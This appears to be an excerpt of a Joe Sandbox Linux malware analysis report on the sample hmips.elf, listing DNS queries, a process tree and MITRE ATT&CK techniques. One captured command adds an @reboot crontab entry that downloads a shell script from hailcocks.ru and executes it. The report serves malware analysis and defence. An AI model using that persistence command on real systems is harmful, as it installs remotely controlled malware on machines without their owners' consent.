Nov 17, 2024 04:43:01.551654100 CET	192.168.2.23	194.36.144.87	0xd1f2	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:01.563513041 CET	192.168.2.23	70.34.254.19	0xb2e1	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:05.741280079 CET	192.168.2.23	139.84.165.176	0xdccf	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:06.569294930 CET	192.168.2.23	152.53.15.127	0x1916	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:10.743099928 CET	192.168.2.23	194.36.144.87	0xd1f2	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:10.754698992 CET	192.168.2.23	70.34.254.19	0xb2e1	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:12.556917906 CET	192.168.2.23	5.161.109.23	0xedc6	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:15.760142088 CET	192.168.2.23	152.53.15.127	0x1916	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:17.563357115 CET	192.168.2.23	65.21.1.106	0x7ca0	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:17.592334032 CET	192.168.2.23	202.61.197.122	0xc11	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:21.777815104 CET	192.168.2.23	5.161.109.23	0xedc6	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:23.958432913 CET	192.168.2.23	217.160.70.42	0x5cfe	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:26.781958103 CET	192.168.2.23	65.21.1.106	0x7ca0	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:26.810915947 CET	192.168.2.23	202.61.197.122	0xc11	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:32.831202030 CET	192.168.2.23	217.160.70.42	0x5cfe	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:37.487236977 CET	192.168.2.23	152.53.15.127	0x4737	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:37.500428915 CET	192.168.2.23	202.61.197.122	0xa74a	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:46.345294952 CET	192.168.2.23	152.53.15.127	0x4737	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:46.358374119 CET	192.168.2.23	202.61.197.122	0xa74a	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:51.000273943 CET	192.168.2.23	168.235.111.72	0x8e55	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:51.971251011 CET	192.168.2.23	168.235.111.72	0x8e55	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:57.189724922 CET	192.168.2.23	65.21.1.106	0xccfb	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:57.218456030 CET	192.168.2.23	194.36.144.87	0xd744	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:57.230621099 CET	192.168.2.23	202.61.197.122	0xd973	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:58.438764095 CET	192.168.2.23	65.21.1.106	0xccfb	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:58.467087030 CET	192.168.2.23	194.36.144.87	0xd744	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false
Nov 17, 2024 04:43:58.479561090 CET	192.168.2.23	202.61.197.122	0xd973	Standard query (0)	kingstonwikkerink.dyn	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: hmips.elf PID: 6257, Parent PID: 6168

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/tmp/hmips.elf
Arguments:	/tmp/hmips.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: hmips.elf PID: 6259, Parent PID: 6257

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: sh PID: 6259, Parent PID: 6257

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/bin/sh
Arguments:	sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6261, Parent PID: 6259

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6263, Parent PID: 6261

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 6263, Parent PID: 6261

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 6262, Parent PID: 6259

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 6262, Parent PID: 6259

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: hmips.elf PID: 6264, Parent PID: 6257

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: hmips.elf PID: 6306, Parent PID: 6264

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Chronological Activities

Analysis Process: hmips.elf PID: 6265, Parent PID: 6257

General

Start time (UTC):	03:41:53
Start date (UTC):	17/11/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report hmips.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/var/spool/cron/crontabs/tmp.fGfSNF

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

System Behavior

Analysis Process: hmips.elf PID: 6257, Parent PID: 6168

General

Chronological Activities

Analysis Process: hmips.elf PID: 6259, Parent PID: 6257

General

Chronological Activities

Analysis Process: sh PID: 6259, Parent PID: 6257

General

Chronological Activities

Analysis Process: sh PID: 6261, Parent PID: 6259

General

Chronological Activities

Analysis Process: sh PID: 6263, Parent PID: 6261

General

Chronological Activities

Analysis Process: crontab PID: 6263, Parent PID: 6261

General

Chronological Activities

Analysis Process: sh PID: 6262, Parent PID: 6259

General

Chronological Activities

Analysis Process: crontab PID: 6262, Parent PID: 6259

General

Linux Analysis Report
hmips.elf